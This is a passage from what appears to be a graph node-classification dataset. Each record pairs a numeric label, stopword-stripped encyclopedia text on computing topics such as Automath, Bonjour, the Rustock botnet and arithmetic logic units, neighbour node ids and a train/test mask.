text based model editing code assistance mdt interacts openmodelica compiler existing corba based api used primarily development openmodelica compiler",
    "neighbors": [
      9376,
      8162,
      11207,
      587,
      10764,
      1917,
      6797,
      3567,
      7983,
      823,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4455,
    "label": 9,
    "text": "Automath:automath automath automating mathematics formal language devised nicolaas govert de bruijn starting 1967 expressing complete mathematical theories way included automated proof checker verify correctness automath system included many novel notions later adopted and/or reinvented areas typed lambda calculus explicit substitution dependent types one outstanding example automath also first practical system exploited curry–howard correspondence propositions represented sets called categories proofs question provability became question non-emptiness type inhabitation de bruijn unaware howard work stated correspondence independently l. s. van benthem jutting part ph.d. thesis 1976 translated edmund landau foundations analysis automath checked correctness automath never widely publicized time however never achieved widespread use nonetheless proved influential later development logical frameworks proof assistants mizar system system writing checking formalized mathematics still active use influenced automath",
    "neighbors": [
      4446,
      4612,
      6070,
      4791,
      8926
    ],
    "mask": "Test"
  },
  {
    "node_id": 4456,
    "label": 4,
    "text": "Bit-flipping_attack:bit-flipping attack bit-flipping attack attack cryptographic cipher attacker change ciphertext way result predictable change plaintext although attacker able learn plaintext note type attack not—directly—against cipher cryptanalysis would particular message series messages extreme could become denial service attack messages particular channel using cipher attack especially dangerous attacker knows format message situation attacker turn similar message one important information altered example change destination address might alter message route way force re-encryption weaker cipher thus possibly making easier attacker decipher message applied digital signatures attacker might able change promissory note stating owe 10.00 one stating owe 10000 stream ciphers rc4 vulnerable bit-flipping attack block cipher modes operation see stream cipher attack keyed message authentication code digital signature authentication mechanism allows recipient detect bits flipped transit",
    "neighbors": [
      434,
      1941,
      262
    ],
    "mask": "Test"
  },
  {
    "node_id": 4457,
    "label": 2,
    "text": "Bonjour_(software):bonjour software bonjour apple implementation zero-configuration networking zeroconf group technologies includes service discovery address assignment hostname resolution bonjour locates devices printers computers services devices offer local network using multicast domain name system mdns service records software comes built-in apple macos ios operating systems bonjour also installed onto computers running microsoft windows bonjour components may also included within software itunes safari introduction 2002 mac os x 10.2 rendezvous software renamed 2005 bonjour following out-of-court trademark dispute settlement bonjour provides general method discover services local area network software widely used throughout macos allows users set network without configuration used find printers file-sharing servers examples applications using bonjour software bonjour browser istumbler macos zeroconf neighborhood explorer windows used view services declared applications apple remote application iphone ipod touch also uses bonjour establish connection itunes libraries via wi-fi bonjour works within single broadcast domain usually small area without special dns configuration macos bonjour windows airport base stations may configured use wide area bonjour allows wide area service discovery via appropriately configured dns server applications generally implement bonjour services using standard tcp/ip calls rather operating system although macos provides various bonjour services bonjour also works operating systems apple made source code bonjour multicast dns responder core component service discovery available darwin open source project project provides source code build responder daemon wide range platforms including mac os 9 macos linux *bsd solaris vxworks windows apple also provides user-installable set services called bonjour windows java libraries number windows programs use zeroconf including adtec digital adobe systems creative suite 3 itunes cerulean studios trillian pro 3 ruckus music player ruckus network text editor e. bonjour released terms-of-limited-use license apple freeware clients though developers software companies wish redistribute part software package use bonjour logo may need licensing agreement source code mdnsresponder available apache license apple originally introduced bonjour software august 2002 part mac os x 10.2 name rendezvous august 27 2003 tibco software inc announced filed lawsuit trademark infringement tibco enterprise application integration product called tibco rendezvous market since 1994 stated tried come agreement apple computer july 2004 apple computer tibco reached out-of-court settlement specifics settlement released public april 12 2005 apple announced renaming rendezvous bonjour current name bonjour french morning afternoon greeting good day previous name rendezvous french meeting appointment date bonjour version 2.0 released february 24 2010 works microsoft windows 2000 2003 xp vista 7 8 10 systems use primarily facilitate installation configuration use network printers thus runs startup bonjour fully implemented windows features—such ichat—allow communication windows mac os bonjour windows also adds zeroconf capabilities internet explorer provides zeroconf implementation java vms third-party applications adobe photoshop cs3 suite also come bundled bonjour take advantage zeroconf technology installers windows systems normally place bonjour files folder called bonjour within program files folder modifies windows system-registry entries related internal network configuration operation bonjour runs mdnsresponder.exe communications across network take place udp port 5353 may require reconfiguring personal corporate firewalls block bonjour packets full installation bonjour windows include plug-in internet explorer printer wizard network communication services components included installed part third-party application component apple software itunes vpn clients configured local network services unavailable computer vpn software active connected case local zeroconf services available bonjour zeroconf implementation september 2008 two security vulnerabilities found bonjour windows certain installations bonjour windows lack uninstaller display human-readable entry windows services listing 32- 64-bit releases windows 7 older still available versions bonjour services disable network connectivity adding entry 0.0.0.0 default gateway bug reported 2013 open-source im clients pidgin kopete adium support bonjour im protocol non-gpl trillian client number browsers allow end-user graphically explore devices found using bonjour bonjour browser creative commons licensed macos application displays services declared using bonjour program originally called rendezvous browser changed name version 1.5.4 apple changed protocol name bonjour certain protocols double clicking list item launch associated helper 1.5.6 first universal binary version future versions allow users completely define service instead relying author bonjour browser recommended service discovery macaddict 123 student research project columbia university produced java-based system match functionality bonjour browser called jbonjourbrowser jbonjourbrowser open-source available gpl jbonjourbrowser built emulate functionality bonjour browser time work multiple platforms requires apple bonjour java library run native windows application offers similar functions bonjour browser mac os bonjour browser windows offered free hobbyist software handydev software commercial implementation called mdnsbrowser offered netputing systems inc",
    "neighbors": [
      514,
      9732,
      9734,
      4615,
      5647,
      1042,
      9258,
      6700,
      4657,
      1074,
      9802,
      5713,
      3670,
      4184,
      3163,
      2141,
      4702,
      3167,
      2149,
      8303,
      6771,
      2676,
      5749,
      9343,
      3719,
      10888,
      11402,
      6797,
      8852,
      1686,
      7318,
      5784,
      1177,
      2716,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      8404,
      3286,
      9430,
      3289,
      4318,
      7908,
      231,
      9451,
      10478,
      2288,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      3879,
      811,
      3371,
      7983,
      9519,
      10036,
      823,
      9529,
      4933,
      10057,
      9035,
      1878,
      8539,
      10088,
      11647,
      9100,
      9109,
      1439,
      425,
      7626,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Test"
  },
  {
    "node_id": 4458,
    "label": 2,
    "text": "Windows_Spotlight:windows spotlight windows spotlight feature included default windows 10 downloads pictures advertisements automatically bing displays lock screen shown computer running windows 10 users occasionally given opportunity mark whether wish see fewer images similar type sometimes images overlaid links advertisements 2017 microsoft began adding location information many photographs images photo credits available display information picture taken many well-known locations famous historical natural landmarks therefore identified identified images include alphabetical continent",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      582,
      2630,
      10310,
      5193,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      8296,
      8299,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      10957,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      6441,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      9033,
      3922,
      4439,
      5465,
      2402,
      2919,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 4459,
    "label": 6,
    "text": "GNOME_Archive_Manager:gnome archive manager archive manager previously file roller archive manager gnome desktop environment archive manager backend programs needed use archive manager frontend archive manager supports following file formats archive manager ability use various formats 7z rar etc appropriate plugins n't give option compress using different levels compression via gui high normal/fast etc unlike many utilities set however using gconf-editor",
    "neighbors": [
      11394,
      6022,
      10121,
      2955,
      1420,
      6413,
      10255,
      8848,
      9872,
      3859,
      1940,
      5397,
      3222,
      9880,
      7450,
      1822,
      6691,
      6694,
      3114,
      10027,
      8621,
      2095,
      7983,
      9908,
      950,
      6713,
      3649,
      2755,
      708,
      11076,
      3015,
      1352,
      4296,
      3659,
      10317,
      5454,
      10575,
      4177,
      722,
      4561,
      1112,
      11614,
      1631,
      3296,
      9953,
      5858,
      3685,
      5095,
      5096,
      6759,
      7529,
      4459,
      7913,
      237,
      1646,
      10476,
      7667,
      3189,
      6389,
      4089,
      2045,
      894,
      10623
    ],
    "mask": "Test"
  },
  {
    "node_id": 4460,
    "label": 4,
    "text": "DNS_Flood:dns flood dns flood type denial-of-service attack process whereby traffic network resource machine stopped time offender sends great number requests resource machine might become unavailable might try reach dns flood host connects internet disrupted due overload traffic referred disruption causes work resource machine halt allowing traffic land attack mainly done hackers benefit attacked resource machine ddos attacks perpetrated many reasons including blackmailing website owners knocking websites including high-profile sites large bank websites many methods adopted prevent types attacks include dropping malformed packages use filters avoid receiving packages sources potential attack timing half open connections greater hostility one also set syn icmp udp lower levels prevent ddos attacks harming one network",
    "neighbors": [
      2409,
      11413,
      4830
    ],
    "mask": "Test"
  },
  {
    "node_id": 4461,
    "label": 4,
    "text": "Telesoft_Technologies:telesoft technologies telesoft technologies privately held uk based technology company develops cyber security telecoms mobile products services government infrastructure telesoft operations usa uk india cyber security products include high rate network flow monitoring appliances operate multi 100gbps networks collection analysis software high rate event driven traffic recorders anomaly ddos crypto-jacking breech detection low latency historical analysis profiling incident response business intelligence",
    "neighbors": [
      4768,
      10557
    ],
    "mask": "None"
  },
  {
    "node_id": 4462,
    "label": 4,
    "text": "Rustock_botnet:rustock botnet rustock botnet botnet operated around 2006 march 2011 consisted computers running microsoft windows capable sending 25,000 spam messages per hour infected pc height activities sent average 192 spam messages per compromised machine per minute reported estimates size vary greatly across different sources claims botnet may comprised anywhere 150,000 2,400,000 machines size botnet increased maintained mostly self-propagation botnet sent many malicious e-mails intended infect machines opening trojan would incorporate machine botnet botnet took hit 2008 takedown mccolo isp responsible hosting botnet command control servers mccolo regained internet connectivity several hours hours 15 mbit second traffic observed likely indicating transfer command control russia actions temporarily reduced global spam levels around 75 effect last long spam levels increased 60 january june 2009 40 attributed rustock botnet march 16 2011 botnet taken initially reported coordinated effort internet service providers software vendors revealed next day take-down called operation b107 action microsoft u.s. federal law enforcement agents fireeye university washington capture individuals involved rustock botnet july 18 2011 microsoft offering monetary reward amount us 250,000 new information results identification arrest criminal conviction individual botnets composed infected computers used unwitting internet users order hide presence user anti-virus software rustock botnet employed rootkit technology computer infected would seek contact command-and-control servers number ip addresses 2,500 domains backup domains may direct zombies botnet perform various tasks sending spam executing distributed denial service ddos attacks ninety-six servers operation time takedown sending spam botnet uses tls encryption around 35 percent cases extra layer protection hide presence whether detected creates additional overhead mail servers handling spam experts pointed extra load could negatively impact mail infrastructure internet e-mails sent days spam",
    "neighbors": [
      3072,
      4356,
      10756,
      3724,
      3852,
      3347,
      4883,
      2325,
      278,
      9630,
      10657,
      6520,
      2213,
      4648,
      939,
      46,
      1337,
      10297,
      3643,
      1979,
      5563,
      7739,
      7996,
      9664,
      9791,
      9154,
      11583,
      8133,
      10952,
      2508,
      81,
      8789,
      8664,
      10457,
      7515,
      988,
      3807,
      5087,
      8032,
      9569,
      2147,
      3941,
      1254,
      8045,
      10477,
      4471,
      3704,
      2041,
      10875,
      3581,
      5886,
      9087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4463,
    "label": 7,
    "text": "Bright_Computing:bright computing bright computing inc. developer software deploying managing high-performance hpc clusters kubernetes clusters openstack private clouds on-prem data centers well public cloud bright computing founded matthijs van leeuwen 2009 spun company clustervision co-founded alex ninaber arijan sauer alex matthijs worked together uk ’ compusys one first companies commercially build hpc clusters left compusys 2002 start clustervision netherlands determining growing market building managing supercomputer clusters using off-the-shelf hardware components open source software tied together customized scripts clustervision also provided delivery installation support services hpc clusters universities government entities 2004 martijn de vries joined clustervision began development cluster management software software made available customers 2008 name clustervisionos v4 2009 bright computing spun clustervision clustervisionos renamed bright cluster manager van leeuwen named bright computing ’ ceo 2010 ing corporate investments made 2.5 million investment bright computing 2014 draper fisher jurvetson dfj us dfj esprit uk prime ventures nl ing corporate investments invested 14.5 million bright computing time bright computing clustervision completely separated february 2016 bright appointed bill wagner chief executive officer matthijs van leeuwen became chief strategy officer left company board directors 2018 wagner presided multiple layoffs august 2019 controversial alliance huawei announced sc 18 early customers included boeing sandia national laboratories virginia tech hewlett packard nsa drexel university many early customers introduced resellers including sicorp cray dell advanced hpc 2019 company 700 customers including 50 fortune 500 companies.this citation 2016 cites much lower number removed bright cluster manager hpc lets customers deploy manage complete clusters provides management hardware operating system hpc software users 2014 company announced bright openstack software deploy provision manage openstack-based private cloud infrastructures 2016 bright started bundling several machine learning frameworks associated tools libraries product make easy get machine learning workload running bright cluster december 2018 version 8.2 released introduced support arm64 architecture edge capabilities build clusters spread many different geographical locations improved workload accounting reporting features well many improvements bright integration kubernetes bright cluster manager software frequently sold original equipment manufacturer oem resellers including dell cray technology partners include bright computing covered software magazine yahoo finance among publications 2016 bright computing awarded €1.5m horizon 2020 sme instrument grant european commission bright computing one 33 grant recipients 960 submitted proposals category 5 260 grants awarded",
    "neighbors": [
      9602,
      1480,
      7432,
      330,
      6858,
      8792,
      3055,
      7248,
      7887,
      6834,
      9137,
      9455,
      4149,
      1400,
      3323,
      10303
    ],
    "mask": "Test"
  },
  {
    "node_id": 4464,
    "label": 4,
    "text": "Comparison_of_antivirus_software:comparison antivirus software non-exhaustive list notable antivirus internet security software form comparison tables according platform e.g desktop mobile server etc operating systems e.g windows os x linux solaris android ios ubuntu touch windows phone etc. term on-demand scan refers possibility performing manual scan user entire computer/device on-access scan refers ability product automatically scan every file creation subsequent modification term cloudav refers ability product automatically perform scans cloud term email security refers protection emails viruses malware antispam refers protection spam scam phishing attacks term web protection usually includes protection infected malicious urls phishing websites online identity protection privacy online banking protection many antivirus products use third-party antivirus engine means antivirus engine made another producer however malware signature and/or parts product may may done owner product list excludes windows phone 7 windows phone 8 support running protection programs",
    "neighbors": [
      2049,
      6683,
      1052,
      550,
      2601,
      6699,
      4659,
      1083,
      7739,
      10308,
      2654,
      4194,
      107,
      10872,
      9341,
      127,
      5249,
      7809,
      131,
      10385,
      156,
      2208,
      2721,
      2213,
      6823,
      3243,
      1708,
      6834,
      704,
      7362,
      202,
      1242,
      10987,
      4863,
      11019,
      7948,
      3342,
      7955,
      4374,
      6431,
      10531,
      1318,
      8998,
      2859,
      3885,
      8493,
      7983,
      7473,
      4403,
      9523,
      823,
      9537,
      4421,
      1355,
      10574,
      4435,
      8024,
      2907,
      7515,
      9055,
      9569,
      3941,
      11622,
      4972,
      3955,
      6516,
      4480,
      2945,
      4994,
      1417,
      3981,
      10637,
      11166,
      8614,
      8615,
      10166,
      7103,
      5069,
      10708,
      2005,
      11225,
      8668,
      9713,
      6643,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4465,
    "label": 3,
    "text": "Arithmetic_logic_unit:arithmetic logic unit arithmetic logic unit alu combinational digital electronic circuit performs arithmetic bitwise operations integer binary numbers contrast floating-point unit fpu operates floating point numbers alu fundamental building block many types computing circuits including central processing unit cpu computers fpus graphics processing units gpus single cpu fpu gpu may contain multiple alus inputs alu data operated called operands code indicating operation performed alu output result performed operation many designs alu also status inputs outputs convey information previous operation current operation respectively alu external status registers alu variety input output nets electrical conductors used convey digital signals alu external circuitry alu operating external circuits apply signals alu inputs response alu produces conveys signals external circuitry via outputs basic alu three parallel data buses consisting two input operands b result output data bus group signals conveys one binary integer number typically b bus widths number signals comprising bus identical match native word size external circuitry e.g. encapsulating cpu processor opcode input parallel bus conveys alu operation selection code enumerated value specifies desired arithmetic logic operation performed alu opcode size bus width determines maximum number different operations alu perform example four-bit opcode specify sixteen different alu operations generally alu opcode machine language opcode though cases may directly encoded bit field within machine language opcode status outputs various individual signals convey supplemental information result current alu operation general-purpose alus commonly status signals end alu operation status output signals usually stored external registers make available future alu operations e.g. implement multiple-precision arithmetic controlling conditional branching collection bit registers store status outputs often treated single multi-bit register referred status register condition code register status inputs allow additional information made available alu performing operation typically single carry-in bit stored carry-out previous alu operation alu combinational logic circuit meaning outputs change asynchronously response input changes normal operation stable signals applied alu inputs enough time known propagation delay passed signals propagate alu circuitry result alu operation appears alu outputs external circuitry connected alu responsible ensuring stability alu input signals throughout operation allowing sufficient time signals propagate alu sampling alu result general external circuitry controls alu applying signals inputs typically external circuitry employs sequential logic control alu operation paced clock signal sufficiently low frequency ensure enough time alu outputs settle worst-case conditions example cpu begins alu addition operation routing operands sources usually registers alu operand inputs control unit simultaneously applies value alu opcode input configuring perform addition time cpu also routes alu result output destination register receive sum alu input signals held stable next clock allowed propagate alu destination register cpu waits next clock next clock arrives destination register stores alu result since alu operation completed alu inputs may set next alu operation number basic arithmetic bitwise logic functions commonly supported alus basic general purpose alus typically include operations repertoires alu shift operations cause operand b shift left right depending opcode shifted operand appears simple alus typically shift operand one bit position whereas complex alus employ barrel shifters allow shift operand arbitrary number bits one operation single-bit shift operations bit shifted operand appears carry-out value bit shifted operand depends type shift integer arithmetic computations multiple-precision arithmetic algorithm operates integers larger alu word size algorithm treats operand ordered collection alu-size fragments arranged most-significant ms least-significant ls vice versa example case 8-bit alu 24-bit integer codice_1 would treated collection three 8-bit fragments codice_2 ms codice_3 codice_4 ls since size fragment exactly matches alu word size alu directly operate piece operand algorithm uses alu directly operate particular operand fragments thus generate corresponding fragment partial multi-precision result partial generated written associated region storage designated multiple-precision result process repeated operand fragments generate complete collection partials result multiple-precision operation arithmetic operations e.g. addition subtraction algorithm starts invoking alu operation operands ls fragments thereby producing ls partial carry bit algorithm writes partial designated storage whereas processor state machine typically stores carry bit alu status register algorithm advances next fragment operand collection invokes alu operation fragments along stored carry bit previous alu operation thus producing another significant partial carry bit carry bit stored status register partial written designated storage process repeats operand fragments processed resulting complete collection partials storage comprise multi-precision arithmetic result multiple-precision shift operations order operand fragment processing depends shift direction left-shift operations fragments processed ls first ls bit partial—which conveyed via stored carry bit—must obtained ms bit previously left-shifted less-significant operand conversely operands processed ms first right-shift operations ms bit partial must obtained ls bit previously right-shifted more-significant operand bitwise logical operations e.g. logical logical operand fragments may processed arbitrary order partial depends corresponding operand fragments stored carry bit previous alu operation ignored although alu designed perform complex functions resulting higher circuit complexity cost power consumption larger size makes impractical many cases consequently alus often limited simple functions executed high speeds i.e. short propagation delays external processor circuitry responsible performing complex functions orchestrating sequence simpler alu operations example computing square root number might implemented various ways depending alu complexity implementations transition fastest expensive slowest least costly square root calculated cases processors simple alus take longer perform calculation multiple alu operations must performed alu usually implemented either stand-alone integrated circuit ic 74181 part complex ic latter case alu typically instantiated synthesizing description written vhdl verilog hardware description language example following vhdl code describes simple 8-bit alu mathematician john von neumann proposed alu concept 1945 report foundations new computer called edvac cost size power consumption electronic circuitry relatively high throughout infancy information age consequently serial computers many early computers pdp-8 simple alu operated one data bit time although often presented wider word size programmers one earliest computers multiple discrete single-bit alu circuits 1948 whirlwind employed sixteen math units enable operate 16-bit words 1967 fairchild introduced first alu implemented integrated circuit fairchild 3800 consisting eight-bit alu accumulator integrated-circuit alus soon emerged including four-bit alus am2901 74181 devices typically bit slice capable meaning carry look ahead signals facilitated use multiple interconnected alu chips create alu wider word size devices quickly became popular widely used bit-slice minicomputers microprocessors began appear early 1970s even though transistors become smaller often insufficient die space full-word-width alu result early microprocessors employed narrow alu required multiple cycles per machine language instruction examples includes popular zilog z80 performed eight-bit additions four-bit alu time transistor geometries shrank following moore law became feasible build wider alus microprocessors modern integrated circuit ic transistors orders magnitude smaller early microprocessors making possible fit highly complex alus ics today many modern alus wide word widths architectural enhancements barrel shifters binary multipliers allow perform single clock cycle operations would required multiple operations earlier alus",
    "neighbors": [
      1029,
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      8732,
      10781,
      2081,
      6181,
      8231,
      10796,
      3630,
      4144,
      6705,
      7218,
      2620,
      2623,
      2113,
      7234,
      1606,
      3142,
      4682,
      2638,
      3159,
      1122,
      7269,
      7270,
      3175,
      5739,
      6252,
      8815,
      4211,
      5235,
      630,
      7286,
      8822,
      9851,
      6268,
      3197,
      4742,
      7302,
      10375,
      7313,
      2708,
      6804,
      4248,
      9368,
      6815,
      8352,
      5793,
      6818,
      6821,
      6311,
      7852,
      9391,
      2224,
      2226,
      3762,
      7858,
      9911,
      11447,
      8890,
      1725,
      2237,
      4286,
      2241,
      2243,
      9932,
      5329,
      725,
      10966,
      731,
      6878,
      11487,
      2273,
      5861,
      5862,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      7421,
      6914,
      8450,
      1798,
      1801,
      780,
      6926,
      6415,
      4881,
      1298,
      11539,
      7963,
      2339,
      6949,
      6950,
      1832,
      11050,
      3886,
      10543,
      10548,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      2383,
      5457,
      7505,
      8530,
      9044,
      11604,
      344,
      3421,
      8543,
      1376,
      9057,
      11107,
      3431,
      10601,
      10603,
      372,
      10612,
      11125,
      1911,
      1399,
      7033,
      1402,
      11636,
      3457,
      9090,
      9092,
      398,
      3470,
      3472,
      5518,
      5523,
      407,
      409,
      10658,
      3493,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1462,
      1463,
      7607,
      4030,
      1983,
      1985,
      3010,
      6596,
      453,
      3014,
      8143,
      466,
      3540,
      1499,
      1502,
      7134,
      5090,
      995,
      2533,
      7653,
      1000,
      7657,
      9707,
      3565,
      4078,
      6639,
      7151,
      10734,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 4466,
    "label": 9,
    "text": "KUKA_Robot_Language:kuka robot language kuka robot language also known krl proprietary programming language similar pascal used control kuka robots krl code consists two different files name permanent data file extension .dat movement command file extension .src krl four basic data types user also create custom data types using enumeration enumeration basic data types used create arrays structures motion commands support several types structures data formats etc robot joints a1-a6 external axis joints e1-e6 frame value sufficient specify tcp location orientation also determine unique robot arm pose additional info required status turn collection flags stored integer",
    "neighbors": [
      10488,
      8524,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 4467,
    "label": 4,
    "text": "Internet_Storm_Center:internet storm center internet storm center isc program sans technology institute branch sans institute monitors level malicious activity internet particularly regard large-scale infrastructure events isc evolved incidents.org site initially founded sans institute assist public-private sector cooperation y2k cutover 2000 incidents.org started cooperate dshield create consensus incidents database cid collected security information cooperating sites agencies mass analysis march 22 2001 sans cid responsible early detection lion worm attacks various facilities quick warning counter-efforts organized cid instrumental controlling damage done worm otherwise might considerably worse later dshield integrated closer incidents.org sans institute started sponsor dshield cid renamed internet storm center acknowledgement way uses distributed sensor network similar way weather reporting center detect track atmospheric storm provide warnings since time isc expanded monitoring operations website cites figure twenty million intrusion detection log entries per day continues provide analyses alerts security threats internet community last hours 2005 first weeks 2006 internet storm center went longest period time yellow infocon wmf vulnerability prominent feature isc daily handler diary prepared one 40 volunteer incident handlers summarized events day frequently first public source new attack trends actively facilitates cooperation soliciting information understand particular attacks better internet storm center currently staffed approximately 40 volunteers representing 8 countries many industries",
    "neighbors": [
      10437,
      6097,
      6643,
      6550,
      183,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 4468,
    "label": 0,
    "text": "Word_embedding:word embedding word embedding collective name set language modeling feature learning techniques natural language processing nlp words phrases vocabulary mapped vectors real numbers conceptually involves mathematical embedding space many dimensions per word continuous vector space much lower dimension methods generate mapping include neural networks dimensionality reduction word co-occurrence matrix probabilistic models explainable knowledge base method explicit representation terms context words appear word phrase embeddings used underlying input representation shown boost performance nlp tasks syntactic parsing sentiment analysis linguistics word embeddings discussed research area distributional semantics aims quantify categorize semantic similarities linguistic items based distributional properties large samples language data underlying idea word characterized company keeps popularized firth technique representing words vectors roots 1960s development vector space model information retrieval reducing number dimensions using singular value decomposition led introduction latent semantic analysis late 1980s 2000 bengio et al provided series papers neural probabilistic language models reduce high dimensionality words representations contexts learning distributed representation words bengio et al 2003 word embeddings come two different styles one words expressed vectors co-occurring words another words expressed vectors linguistic contexts words occur different styles studied lavelli et al 2004 roweis saul published science use locally linear embedding lle discover representations high dimensional data structures area developed gradually really took 2010 partly important advances made since quality vectors training speed model many branches many research groups working word embeddings 2013 team google led tomas mikolov created word2vec word embedding toolkit train vector space models faster previous approaches new word embedding techniques rely neural network architecture instead traditional n-gram models unsupervised learning one main limitations word embeddings word vector space models general possible meanings word conflated single representation single vector semantic space sense embeddings proposed solution problem individual meanings words represented distinct vectors space word embeddings n- grams biological sequences e.g dna rna proteins bioinformatics applications proposed asgari mofrad named bio-vectors biovec refer biological sequences general protein-vectors protvec proteins amino-acid sequences gene-vectors genevec gene sequences representation widely used applications deep learning proteomics genomics results presented asgari mofrad suggest biovectors characterize biological sequences terms biochemical biophysical interpretations underlying patterns thought vectors extension word embeddings entire sentences even documents researchers hope improve quality machine translation software training using word embeddings includes tomas mikolov word2vec stanford university glove allennlp elmo fasttext gensim indra deeplearning4j principal component analysis pca t-distributed stochastic neighbour embedding t-sne used reduce dimensionality word vector spaces visualize word embeddings clusters instance fasttext also used calculate word embeddings text corpora sketch engine available online",
    "neighbors": [
      6274,
      11330,
      3748,
      7780,
      2602,
      7577,
      8843,
      7599,
      9935,
      1044,
      5399,
      3288,
      5214,
      7164,
      3998
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4469,
    "label": 0,
    "text": "BulSemCor:bulsemcor bulgarian sense-annotated corpus bulsemcor bulgarian български семантично анотиран корпус булсемкор structured corpus bulgarian texts lexical item assigned sense tag bulsemcor created department computational linguistics institute bulgarian language bulgarian academy sciences bulsemcor created part nationally funded project titled bulnet – lexico-semantic network bulgarian language 2005–2010 follows general methodology semcor combined specific principles corpus annotation consists 101,791 tokens covering excerpt bulgarian brown corpus modelled brown corpus important feature bulsemcor samples selected using heuristics provide optimal coverage ambiguous lexis bulsemcor manually sense-annotated according bulgarian wordnet size comparable contemporary semantically annotated corpora pool acceptable linguistic components semantic annotation consists associating lexical item corpus exactly one synonym set synset bulgarian wordnet best describes sense particular context selection best match among suggested candidates based set procedures synset members synset gloss explanatory definition position given candidate wordnet structure number annotated tokens 99,480 difference number tokens compared initial corpus due fact linguistic items simple word count 86,842 multiword expressions mwe 5,797 12,638 tokens words bulsemcor assigned sense according established practice simple content words content word classes typically nouns verbs annotated since 2000 development language resources broadened include annotation function words multiword expressions covering particular senses types words expressions respect bulsemcor annotation exhaustive hence provides greater opportunities linguistic observations non-linear programming nlp applications annotated items inherit linguistic information associated corresponding synset along morphological semanic tags may include annotation one following additional levels",
    "neighbors": [
      7353,
      7371,
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 4470,
    "label": 7,
    "text": "Symbiose_(web_desktop):symbiose web desktop symbiose web desktop web integrated development environment symbiose replicates desktop environment modern operating system webpage using javascript communicate remote server allows users save current desktop state return later much like hibernation feature many true operating systems integrate dropbox google drive ftp files web desktop software beta stage",
    "neighbors": [
      7364,
      3109,
      3462,
      7983,
      4623
    ],
    "mask": "None"
  },
  {
    "node_id": 4471,
    "label": 4,
    "text": "Trustwave_Holdings:trustwave holdings trustwave holdings information security company helps businesses fight cybercrime protect data reduce security risk company international headquarters located downtown chicago regional offices located london são paulo sydney company also operates security operations centers chicago denver manila minneapolis singapore sydney tokyo warsaw waterloo ontario trustwave currently company authorized pci forensic investigator geographic regions trustwave standalone business unit cyber security brand singaporean telecommunications company singtel group enterprise april 2011 trustwave holdings filed ipo though company standalone subsidiary singtel trustwave website says company 1,600 employees april 8 2015 sgt singapore telecommunications ltd singtel announced entered definitive agreement acquire trustwave holdings inc. fee 810 million—singtel 98 stake company leaving 2 trustwave ceo president according media reports singtel filings singapore exchange enterprise value trustwave time deal 850 million managed security services service involves remotely managing third-party products network access control siem united threat management companies wish outsource security needs according forrester wave managed security services north america q4 2014 trustwave market leader managed security services trustkeeper cloud-based platform ties together trustwave various managed security services trustkeeper businesses access variety trustwave apps ranging enterprise-class managed security services pci compliance automation tools designed help credit card merchants protect unauthorized access managed security testing application within trustkeeper provides interactive way view track penetration test reports alternative conventional pdf based reports earlier versions called trustwave pentest manager 2012 sc magazine europe innovation award secure web gateway formerly finjan appliance-based secure web gateway uses real-time code analysis technology url filtering antivirus scanning prevent malware web-based threats may 2011 m86 secure web gateway designated visionary 2011 gartner magic quadrant report secure web gateways secure email gateway formerly m86 mailmarshal email security solution available software cloud-based service protects malware spam data leakage also provides reporting analyzes inbound outbound content assists policy control april 2010 m86 mailmarshal smtp product designated visionary 2010 gartner magic quadrant report secure email gateways associated technologies spiderlabs advanced security services research team trustwave developed security researcher nicholas j. percoco team specializes forensic investigations penetration testing education services security research used update trustwave products services threat intelligence spiderlabs also authors trustwave global security report annual report detailing latest security trends risk areas spiderlabs also actively develops open source web application firewall modsecurity supplementary commercial rule set available purchase trustwave securebrowsing free security plug-in web browsers checks links real time using secure web gateway link web page given rating green indicating link safe red link safe february 2014 trustwave svp phillip j. smith offered expert testimony related data breaches malware part congressional hearing house committee energy commerce prepared testimony presented observations based company experience investigating thousands data breaches ongoing malware security research forms threat intelligence trustwave operates x.509 certificate authority ca used top level trust many web browsers operating systems applications trusted root ca 2011 trustwave sold certificate subordinate ca allowed customer present ssl certificates identifying arbitrary entities similar mechanism man middle attack type action similar practice running ssl proxy corporate network though case public subordinate ca valid anywhere used instead internal corporate-generated domain ca valid machines accept part organizational policy making risk abuse much higher though trustwave asserts special precautions put place ensure customer attached device particular customer-owned network acceptable customer 